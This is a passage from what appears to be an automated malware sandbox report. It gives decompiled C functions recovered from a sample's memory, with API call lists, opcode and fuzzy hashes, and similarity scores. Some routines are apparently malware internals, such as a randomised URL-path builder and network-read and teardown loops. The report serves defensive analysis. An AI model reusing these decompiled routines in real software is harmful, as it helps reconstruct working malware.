                        				intOrPtr* _t46;
                        				char _t48;
                        				char* _t53;
                        				long _t54;
                        				intOrPtr* _t55;
                        				void* _t64;
                        
                        				_t64 = __eax;
                        				_t40 =  &_v12;
                        				_v8 = 0;
                        				_v16 = 0;
                        				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
                        				if(_t40 == 0) {
                        					_t41 = GetLastError();
                        					_v8 = _t41;
                        					if(_t41 != 0x2efe) {
                        						L26:
                        						return _v8;
                        					}
                        					_v8 = 0;
                        					L25:
                        					 *((intOrPtr*)(_t64 + 0x30)) = 0;
                        					goto L26;
                        				}
                        				if(_v12 == 0) {
                        					goto L25;
                        				}
                        				_push( &_v24);
                        				_push(1);
                        				_push(0);
                        				if( *0x50a148() != 0) {
                        					_v8 = 8;
                        					goto L26;
                        				}
                        				_t45 = E00505C4E(0x1000);
                        				_v20 = _t45;
                        				if(_t45 == 0) {
                        					_v8 = 8;
                        					L21:
                        					_t46 = _v24;
                        					 *((intOrPtr*)( *_t46 + 8))(_t46);
                        					goto L26;
                        				} else {
                        					goto L4;
                        				}
                        				do {
                        					while(1) {
                        						L4:
                        						_t48 = _v12;
                        						if(_t48 >= 0x1000) {
                        							_t48 = 0x1000;
                        						}
                        						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
                        						if(_t48 == 0) {
                        							break;
                        						}
                        						_t55 = _v24;
                        						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
                        						_t17 =  &_v12;
                        						 *_t17 = _v12 - _v16;
                        						if( *_t17 != 0) {
                        							continue;
                        						}
                        						L10:
                        						if(WaitForSingleObject( *0x50a2c4, 0) != 0x102) {
                        							_v8 = 0x102;
                        							L18:
                        							E00502A03(_v20);
                        							if(_v8 == 0) {
                        								_v8 = E00506589(_v24, _t64);
                        							}
                        							goto L21;
                        						}
                        						_t53 =  &_v12;
                        						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
                        						if(_t53 != 0) {
                        							goto L15;
                        						}
                        						_t54 = GetLastError();
                        						_v8 = _t54;
                        						if(_t54 != 0x2f78 || _v12 != 0) {
                        							goto L18;
                        						} else {
                        							_v8 = 0;
                        							goto L15;
                        						}
                        					}
                        					_v8 = GetLastError();
                        					goto L10;
                        					L15:
                        				} while (_v12 != 0);
                        				goto L18;
                        			}

                        APIs
                        • GetLastError.KERNEL32 ref: 0050479C
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        • GetLastError.KERNEL32 ref: 00504710
                        • WaitForSingleObject.KERNEL32(00000000), ref: 00504720
                        • GetLastError.KERNEL32 ref: 00504740
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: ErrorLast$AllocateHeapObjectSingleWait
                        • String ID:
                        • API String ID: 35602742-0
                        • Opcode ID: 11bd46ae6fa82b03bc34a13868eb11942c58d37be7a4c39c4fa113d493443214
                        • Instruction ID: 6e5f08f4743b9139c5a4ce280a462027a1f5a5cc5f14e899c21a6447e65b698e
                        • Opcode Fuzzy Hash: 11bd46ae6fa82b03bc34a13868eb11942c58d37be7a4c39c4fa113d493443214
                        • Instruction Fuzzy Hash: E94119B4901209EFDF10DFA4C9889AEBFB9FB55340F604469E602E71A1E7309E45EF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • lstrcmp.KERNEL32(00000001,00000001), ref: 005051FE
                        • lstrlen.KERNEL32(00000001,005092D8,00000028,0050534C,00000000), ref: 00505209
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrcmplstrlen
                        • String ID: (LSP$LSP
                        • API String ID: 898299967-3527286715
                        • Opcode ID: cf01ddacae7994589fe21d873ebf957a4698f1181e2ec4962340c37b100a8a42
                        • Instruction ID: 1ae3c29f2e706af512f4975c15c8233b104e39f4304075dda6aa5967d75e4219
                        • Opcode Fuzzy Hash: cf01ddacae7994589fe21d873ebf957a4698f1181e2ec4962340c37b100a8a42
                        • Instruction Fuzzy Hash: 63411A75905A06DFCB18CFA9D8846AEBBF1BF59300B18892ED446A7291E730A985CF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6C55235E
                        • __isleadbyte_l.LIBCMT ref: 6C55238C
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000040,00000001,?,00000000), ref: 6C5523BA
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000040,00000001,?,00000000), ref: 6C5523F0
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 7a72e7cddda788c7839d0ef1ed5832f63bab5cfdf505fbcfafb96bba24e32371
                        • Instruction ID: 5a80abe2180239740689a8a7b1b4d1af9a2c6f97a7984e8a00b659925f0fcf83
                        • Opcode Fuzzy Hash: 7a72e7cddda788c7839d0ef1ed5832f63bab5cfdf505fbcfafb96bba24e32371
                        • Instruction Fuzzy Hash: 7731F230601246EFDB15CF25CC48BAE7BB5FF41314F56452AE8249B9A0E730D8A1DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E00507289(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                        				intOrPtr _v12;
                        				void* _v16;
                        				void* _v28;
                        				char _v32;
                        				void* __esi;
                        				void* _t29;
                        				void* _t38;
                        				signed int* _t39;
                        				void* _t40;
                        
                        				_t36 = __ecx;
                        				_v32 = 0;
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				_v12 = _a4;
                        				_t38 = E00502616(__ecx,  &_v32);
                        				if(_t38 != 0) {
                        					L12:
                        					_t39 = _a8;
                        					L13:
                        					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                        						_t23 =  &(_t39[1]);
                        						if(_t39[1] != 0) {
                        							E005028B8(_t23);
                        						}
                        					}
                        					return _t38;
                        				}
                        				if(E00504380(0x40,  &_v16) != 0) {
                        					_v16 = 0;
                        				}
                        				_t40 = CreateEventA(0x50a2d4, 1, 0,  *0x50a394);
                        				if(_t40 != 0) {
                        					SetEvent(_t40);
                        					Sleep(0xbb8);
                        					CloseHandle(_t40);
                        				}
                        				_push( &_v32);
                        				if(_a12 == 0) {
                        					_t29 = E00507360(_t36);
                        				} else {
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_t29 = E0050202E(_t36);
                        				}
                        				_t41 = _v16;
                        				_t38 = _t29;
                        				if(_v16 != 0) {
                        					E00503EFA(_t41);
                        				}
                        				if(_t38 != 0) {
                        					goto L12;
                        				} else {
                        					_t39 = _a8;
                        					_t38 = E00504CD5( &_v32, _t39);
                        					goto L13;
                        				}
                        			}

                        APIs
                        • CreateEventA.KERNEL32(0050A2D4,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,00501C40,?,00000001), ref: 005072DA
                        • SetEvent.KERNEL32(00000000,?,?,?,?,00501C40,?,00000001,00502F7D,00000002,?,?,00502F7D), ref: 005072E7
                        • Sleep.KERNEL32(00000BB8,?,?,?,?,00501C40,?,00000001,00502F7D,00000002,?,?,00502F7D), ref: 005072F2
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00501C40,?,00000001,00502F7D,00000002,?,?,00502F7D), ref: 005072F9
                          • Part of subcall function 00507360: WaitForSingleObject.KERNEL32(00000000,?,?,?,00507319,?,00507319,?,?,?,?,?,00507319,?), ref: 0050743A
                          • Part of subcall function 00507360: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00507319,?,?,?,?,?,00501C40,?), ref: 00507462
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File
                        Similarity
                        • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
                        • String ID:
                        • API String ID: 467273019-0
                        • Opcode ID: 09ee71289984c942b85821d43a4168e3184bf30c7b28c969a8a84e73065e5bf8
                        • Instruction ID: 17f73fe9f00533af79ff600da513855ad15e733eab92633bc4c98a598608d6a5
                        • Opcode Fuzzy Hash: 09ee71289984c942b85821d43a4168e3184bf30c7b28c969a8a84e73065e5bf8
                        • Instruction Fuzzy Hash: 54219872D0421EABDB20AFE4C8898DE7B7DBB48350B054825FA11A71C0D774FD459BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E00504138(unsigned int __eax, void* __ecx) {
                        				void* _v8;
                        				void* _v12;
                        				signed int _t21;
                        				signed short _t23;
                        				char* _t27;
                        				void* _t29;
                        				void* _t30;
                        				unsigned int _t33;
                        				void* _t37;
                        				unsigned int _t38;
                        				void* _t41;
                        				void* _t42;
                        				int _t45;
                        				void* _t46;
                        
                        				_t42 = __eax;
                        				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                        				_t38 = __eax;
                        				_t30 = RtlAllocateHeap( *0x50a290, 0, (__eax >> 3) + __eax + 1);
                        				_v12 = _t30;
                        				if(_t30 != 0) {
                        					_v8 = _t42;
                        					do {
                        						_t33 = 0x18;
                        						if(_t38 <= _t33) {
                        							_t33 = _t38;
                        						}
                        						_t21 =  *0x50a2a8; // 0xb41a161c
                        						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                        						 *0x50a2a8 = _t23;
                        						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                        						memcpy(_t30, _v8, _t45);
                        						_v8 = _v8 + _t45;
                        						_t27 = _t30 + _t45;
                        						_t38 = _t38 - _t45;
                        						_t46 = _t46 + 0xc;
                        						 *_t27 = 0x2f;
                        						_t13 = _t27 + 1; // 0x1
                        						_t30 = _t13;
                        					} while (_t38 > 8);
                        					memcpy(_t30, _v8, _t38 + 1);
                        				}
                        				return _v12;
                        			}


















                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00505B76,00000000,?,00000000,00506301,00000000,02FE9630), ref: 00504143
                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0050415B
                        • memcpy.NTDLL(00000000,02FE9630,-00000008,?,?,?,00505B76,00000000,?,00000000,00506301,00000000,02FE9630), ref: 0050419F
                        • memcpy.NTDLL(00000001,02FE9630,00000001,00506301,00000000,02FE9630), ref: 005041C0
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: memcpy$AllocateHeaplstrlen
                        • String ID:
                        • API String ID: 1819133394-0
                        • Opcode ID: 2e74b7ca07cae5f1d93a2dbd24dc75448e27933fb518ac2747bbad8cc4cee281
                        • Instruction ID: d21d63049f3def4b13f9494b3415488b98211b599425a4b330c492edd3edc1ff
                        • Opcode Fuzzy Hash: 2e74b7ca07cae5f1d93a2dbd24dc75448e27933fb518ac2747bbad8cc4cee281
                        • Instruction Fuzzy Hash: B01106B2A00215AFC710CB69DC89D9EBFBEEBA43A0B050176F90497190E6709E48D760
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E005049BA(char* __eax) {
                        				char* _t8;
                        				intOrPtr _t12;
                        				char* _t21;
                        				signed int _t23;
                        				char* _t24;
                        				signed int _t26;
                        				void* _t27;
                        
                        				_t21 = __eax;
                        				_push(0x20);
                        				_t23 = 1;
                        				_push(__eax);
                        				while(1) {
                        					_t8 = StrChrA();
                        					if(_t8 == 0) {
                        						break;
                        					}
                        					_t23 = _t23 + 1;
                        					_push(0x20);
                        					_push( &(_t8[1]));
                        				}
                        				_t12 = E00505C4E(_t23 << 2);
                        				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                        				if(_t12 != 0) {
                        					StrTrimA(_t21, 0x5092c4);
                        					_t26 = 0;
                        					do {
                        						_t24 = StrChrA(_t21, 0x20);
                        						if(_t24 != 0) {
                        							 *_t24 = 0;
                        							_t24 =  &(_t24[1]);
                        							StrTrimA(_t24, 0x5092c4);
                        						}
                        						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                        						_t26 = _t26 + 1;
                        						_t21 = _t24;
                        					} while (_t24 != 0);
                        					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                        				}
                        				return 0;
                        			}











                        APIs
                        • StrChrA.SHLWAPI(?,00000020,00000000,02FE962C,?,?,?,00506072,02FE962C,?,?,00502F44), ref: 005049D4
                        • StrTrimA.SHLWAPI(?,005092C4,00000002,?,?,?,00506072,02FE962C,?,?,00502F44), ref: 005049F3
                        • StrChrA.SHLWAPI(?,00000020,?,?,?,00506072,02FE962C,?,?,00502F44,?,?,?,?,?,005044F9), ref: 005049FE
                        • StrTrimA.SHLWAPI(00000001,005092C4,?,?,?,00506072,02FE962C,?,?,00502F44,?,?,?,?,?,005044F9), ref: 00504A10
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Trim
                        • String ID:
                        • API String ID: 3043112668-0
                        • Opcode ID: 9f3d8f474ec395904bd1f9923cbb2745517ebc00d01ebf5eecb93981c96820a4
                        • Instruction ID: d495b58aaea21443c943f25fd65a029591251948e4f33567303dcf1e6f397033
                        • Opcode Fuzzy Hash: 9f3d8f474ec395904bd1f9923cbb2745517ebc00d01ebf5eecb93981c96820a4
                        • Instruction Fuzzy Hash: 8A01D8B17453226FD2319F599C49F2FBE9CFB99B60F110919F981C72D0EB60CC019AA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C53E2FC
                          • Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011
                        • std::exception::exception.LIBCMT ref: 6C53E35D
                          • Part of subcall function 6C544920: std::exception::_Copy_str.LIBCMT ref: 6C544939
                        • __CxxThrowException@8.LIBCMT ref: 6C53E374
                          • Part of subcall function 6C544A87: RaiseException.KERNEL32(?,00000000,?,?,00000000), ref: 6C544ADC
                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6C53E37B
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::exception::_std::exception::exception
                        • String ID:
                        • API String ID: 271752322-0
                        • Opcode ID: 2b3b6e6723eb042a15c1c769ed2a318c639cbbde6adf2725a4a49a7e420fb218
                        • Instruction ID: 75e84e18f0d0d47583a09adfd5bcab01d07b0f87cfba9ac1ed6c61a328e24978
                        • Opcode Fuzzy Hash: 2b3b6e6723eb042a15c1c769ed2a318c639cbbde6adf2725a4a49a7e420fb218
                        • Instruction Fuzzy Hash: 3F2117B1408B809FD320CF29CC45B47BBE4BB59318F048E1EE489D7B51E775A508CBA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E00501970(intOrPtr _a4, intOrPtr _a8) {
                        				char _v20;
                        				void* _t8;
                        				void* _t13;
                        				void* _t16;
                        				char* _t18;
                        				void* _t19;
                        
                        				_t19 = 0x27;
                        				_t1 =  &_v20; // 0x74666f53
                        				_t18 = 0;
                        				E0050354E(_t8, _t1);
                        				_t16 = E00505C4E(_t19);
                        				if(_t16 != 0) {
                        					_t3 =  &_v20; // 0x74666f53
                        					_t13 = E0050756E(_t3, _t16, _a8);
                        					if(_a4 != 0) {
                        						__imp__(_a4);
                        						_t19 = _t13 + 0x27;
                        					}
                        					_t18 = E00505C4E(_t19);
                        					if(_t18 != 0) {
                        						 *_t18 = 0;
                        						if(_a4 != 0) {
                        							__imp__(_t18, _a4);
                        						}
                        						__imp__(_t18, _t16);
                        					}
                        					E00502A03(_t16);
                        				}
                        				return _t18;
                        			}










                        APIs
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                          • Part of subcall function 0050756E: wsprintfA.USER32 ref: 005075CA
                        • lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00503EC5,74666F53,00000000,?,00000000,?,?,00502F4F), ref: 005019A6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005019CA
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005019D2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                        • String ID: Soft
                        • API String ID: 393707159-3753413193
                        • Opcode ID: 0a580aa412be87ab69361572447e4b4b6bb17890e36401a12c3dc29c7416b65e
                        • Instruction ID: 79c552c5a8d2966e38a0aa72d7766e271a31634ed5a025d7c794a376a85bf87f
                        • Opcode Fuzzy Hash: 0a580aa412be87ab69361572447e4b4b6bb17890e36401a12c3dc29c7416b65e
                        • Instruction Fuzzy Hash: 8501AD72100A0AA7CB122B699C9DAEF3F6DBFC4395F044421F9045A196EB748949DBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ___BuildCatchObject.LIBCMT ref: 6C545D60
                          • Part of subcall function 6C546388: ___BuildCatchObjectHelper.LIBCMT ref: 6C5463BA
                          • Part of subcall function 6C546388: ___AdjustPointer.LIBCMT ref: 6C5463D1
                        • _UnwindNestedFrames.LIBCMT ref: 6C545D77
                        • ___FrameUnwindToState.LIBCMT ref: 6C545D89
                        • CallCatchBlock.LIBCMT ref: 6C545DAD
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                        • String ID:
                        • API String ID: 2901542994-0
                        • Opcode ID: c8c05acd160c18110a825d926067d22bf0635e9fd943c4b85a96cd4fad5b6d9c
                        • Instruction ID: 06ef5a2d8d22aa8a92496df2168eaa61385d82b55d0d916cf3263432c2d04bcf
                        • Opcode Fuzzy Hash: c8c05acd160c18110a825d926067d22bf0635e9fd943c4b85a96cd4fad5b6d9c
                        • Instruction Fuzzy Hash: F501E932000609FBCF129F65CC04EDA7BBAEF89758F558115F91866620D732E965DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction ID: aeb5e0d8d14cba1a8152e2aa050c80c04b4ab79af9873b8d7e3320efd685411a
                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction Fuzzy Hash: C9014C3208024AFBCF029E84DC01DEE7F22BF59358F549915FE2898530D376D9B1AB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E00506027(void** __esi) {
                        				char* _v0;
                        				intOrPtr _t4;
                        				intOrPtr _t6;
                        				void* _t8;
                        				intOrPtr _t11;
                        				void* _t12;
                        				void** _t14;
                        
                        				_t14 = __esi;
                        				_t4 =  *0x50a37c; // 0x2fe9630
                        				__imp__(_t4 + 0x40);
                        				while(1) {
                        					_t6 =  *0x50a37c; // 0x2fe9630
                        					_t1 = _t6 + 0x58; // 0x0
                        					if( *_t1 == 0) {
                        						break;
                        					}
                        					Sleep(0xa);
                        				}
                        				_t8 =  *_t14;
                        				if(_t8 != 0 && _t8 != 0x50a030) {
                        					HeapFree( *0x50a290, 0, _t8);
                        				}
                        				_t14[1] = E005049BA(_v0, _t14);
                        				_t11 =  *0x50a37c; // 0x2fe9630
                        				_t12 = _t11 + 0x40;
                        				__imp__(_t12);
                        				return _t12;
                        			}











                        APIs
                        • RtlEnterCriticalSection.NTDLL(02FE95F0), ref: 00506030
                        • Sleep.KERNEL32(0000000A,?,?,00502F44,?,?,?,?,?,005044F9,?,00000001), ref: 0050603A
                        • HeapFree.KERNEL32(00000000,00000000,?,?,00502F44,?,?,?,?,?,005044F9,?,00000001), ref: 00506062
                        • RtlLeaveCriticalSection.NTDLL(02FE95F0), ref: 0050607E
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                        • String ID:
                        • API String ID: 58946197-0
                        • Opcode ID: e4f56e5aa31ed8a54c04cb5f2342416cbcac381b13391fdb4af21fe20eb88e9d
                        • Instruction ID: fb18d43634853e7f74f64b1771544969ac4a109ea22aeb9569364367deee149e
                        • Opcode Fuzzy Hash: e4f56e5aa31ed8a54c04cb5f2342416cbcac381b13391fdb4af21fe20eb88e9d
                        • Instruction Fuzzy Hash: 4CF0F8712403419BEB21DF39ED6CF5E7BE8BB25741B048815F985D62A6C630E818EB26
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00501547() {
                        				void* _t1;
                        				intOrPtr _t5;
                        				void* _t6;
                        				void* _t7;
                        				void* _t11;
                        
                        				_t1 =  *0x50a2c4; // 0x2a4
                        				if(_t1 == 0) {
                        					L8:
                        					return 0;
                        				}
                        				SetEvent(_t1);
                        				_t11 = 0x7fffffff;
                        				while(1) {
                        					SleepEx(0x64, 1);
                        					_t5 =  *0x50a304; // 0x0
                        					if(_t5 == 0) {
                        						break;
                        					}
                        					_t11 = _t11 - 0x64;
                        					if(_t11 > 0) {
                        						continue;
                        					}
                        					break;
                        				}
                        				_t6 =  *0x50a2c4; // 0x2a4
                        				if(_t6 != 0) {
                        					CloseHandle(_t6);
                        				}
                        				_t7 =  *0x50a290; // 0x2bf0000
                        				if(_t7 != 0) {
                        					HeapDestroy(_t7);
                        				}
                        				goto L8;
                        			}









                        APIs
                        • SetEvent.KERNEL32(000002A4,00000001,00504214), ref: 00501552
                        • SleepEx.KERNEL32(00000064,00000001), ref: 00501561
                        • CloseHandle.KERNEL32(000002A4), ref: 00501582
                        • HeapDestroy.KERNEL32(02BF0000), ref: 00501592
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: CloseDestroyEventHandleHeapSleep
                        • String ID:
                        • API String ID: 4109453060-0
                        • Opcode ID: 34cac8b5786208ad669a55e2e3811d4693ac73f7ed1ab30c330852be7493ec3c
                        • Instruction ID: 78ca3f24518e93ea16646e6d90396b3d606d41f92285cd2b3f50aff49aa64ab3
                        • Opcode Fuzzy Hash: 34cac8b5786208ad669a55e2e3811d4693ac73f7ed1ab30c330852be7493ec3c
                        • Instruction Fuzzy Hash: 24F06575B007129BEB205B74AD5CB5F3BACBB757117040514BC1ADB1E5CB24CD08ED56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E0050461D() {
                        				void* _v0;
                        				void** _t3;
                        				void** _t5;
                        				void** _t7;
                        				void** _t8;
                        				void* _t10;
                        
                        				_t3 =  *0x50a37c; // 0x2fe9630
                        				__imp__( &(_t3[0x10]));
                        				while(1) {
                        					_t5 =  *0x50a37c; // 0x2fe9630
                        					_t1 =  &(_t5[0x16]); // 0x0
                        					if( *_t1 == 0) {
                        						break;
                        					}
                        					Sleep(0xa);
                        				}
                        				_t7 =  *0x50a37c; // 0x2fe9630
                        				_t10 =  *_t7;
                        				if(_t10 != 0 && _t10 != 0x50b882) {
                        					HeapFree( *0x50a290, 0, _t10);
                        					_t7 =  *0x50a37c; // 0x2fe9630
                        				}
                        				 *_t7 = _v0;
                        				_t8 =  &(_t7[0x10]);
                        				__imp__(_t8);
                        				return _t8;
                        			}










                        APIs
                        • RtlEnterCriticalSection.NTDLL(02FE95F0), ref: 00504626
                        • Sleep.KERNEL32(0000000A,?,?,00502F44,?,?,?,?,?,005044F9,?,00000001), ref: 00504630
                        • HeapFree.KERNEL32(00000000,?,?,?,00502F44,?,?,?,?,?,005044F9,?,00000001), ref: 0050465E
                        • RtlLeaveCriticalSection.NTDLL(02FE95F0), ref: 00504673
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                        • String ID:
                        • API String ID: 58946197-0
                        • Opcode ID: 071dbea66fc8af25260031236331cbcb1c0c006dd3d35cc1cbf5a6c86a4b285f
                        • Instruction ID: da62e5bd1e6a2380a68eb2c31f1b2247bbb6d2c63e5c1a4f6c99d5d9f126f872
                        • Opcode Fuzzy Hash: 071dbea66fc8af25260031236331cbcb1c0c006dd3d35cc1cbf5a6c86a4b285f
                        • Instruction Fuzzy Hash: EEF0F8B8600201DFEB29CF24EDA9F5D7BA4BB69701B049519E906C73B5D731AC08EE15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • _memmove.LIBCMT ref: 6C53FA62
                          • Part of subcall function 6C53EF40: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C53EFD0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_memmove
                        • String ID: string too long
                        • API String ID: 2765667529-2556327735
                        • Opcode ID: d1dfbec92bbc0398621f87c904040bceccc825110e91f1c3f8b92d78891c23d7
                        • Instruction ID: f5f993bfe883df6dd9dd239aa8261ceedf3f5cc493c57bde823f956cb2d9164e
                        • Opcode Fuzzy Hash: d1dfbec92bbc0398621f87c904040bceccc825110e91f1c3f8b92d78891c23d7
                        • Instruction Fuzzy Hash: 695106722083609FD3218E3DEC90B5BB7D6EFD1310F195EAAD4D9C7A91E724984C8762
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
